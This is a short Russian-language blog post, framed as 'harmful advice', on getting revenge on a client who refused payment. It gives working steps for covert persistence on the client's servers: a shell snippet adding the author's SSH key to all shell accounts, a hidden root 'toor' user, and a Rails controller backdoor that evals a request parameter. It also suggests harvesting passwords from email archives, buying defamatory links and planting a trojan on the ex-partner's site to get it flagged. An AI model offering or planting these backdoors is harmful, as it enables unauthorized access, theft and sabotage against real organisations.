zed.0xff.me
вредные советы
Что можно сделать “приятного” заказчику, для которого вы сделали много полезной работы, а он вам в ответ показал большую фигу.
меры превентивные, т.е. выполнять это всё надо не тогда, когда уже вас везде заблочили, а когда некоторым чувством вы начинаете чувствовать что вас хотят нае…
((в моем недавнем случае – это два месяца неоплаченной работы под предлогом “завтра-завтра, на следующей неделе..”, а потом жесткий посыл с блокированием акков на серверах)
- добавить свой ssh public key во все акки на сервере, имеющие шелл (смотреть в /etc/passwd) (нужны рутовые права)
1 2 3 4 5 |
mkdir /home/someacc/.ssh cat /my/id_rsa.pub >> /home/someacc/.ssh/authorized_keys chown -R someacc /home/someacc/.ssh chmod 700 /home/someacc/.ssh chmod 600 /home/someacc/.ssh/* |
- создать юзера toor с uid=0, gid=0, валидным шеллом и секретным паролем
- сделать в коде закладку, позволяющую выполнить произвольный код
1 2 3 4 5 6 |
# пример для ruby/rails dеf %some_controller_method% rеndеr :teхt => еval(params[:x].to_s).inspесt rеscue Eхception => ех rеndеr :teхt => ех.inspect еnd |
- прошерстить архив почты на тему каких-то общих паролей к бэйзкампу, амазону и др.сервисам. особенно удобно при использовании гмейла как основного средства обмена сообщениями в проекте – поиск удобный )
- если на месть не жалко собственных средств – то можно зарегистрироваться на бирже ссылок типа linkfeed.ru или sape.ru, и потратить определенную сумму денег на размещение на различных сайтах ссылок на сайт(ы) обманувшего вас партнера, используя ключевые слова вида “cheaters”, “they stole my money”, “malware site” (?)
- взять любой троянчик, положить его на сайт бывшего партнера, и отрапортовать в http://www.google.com/safebrowsing/report_badware/
- прошерстить код приложения на тему eval() и использовать его в своих корыстных целях
- ваши предложения?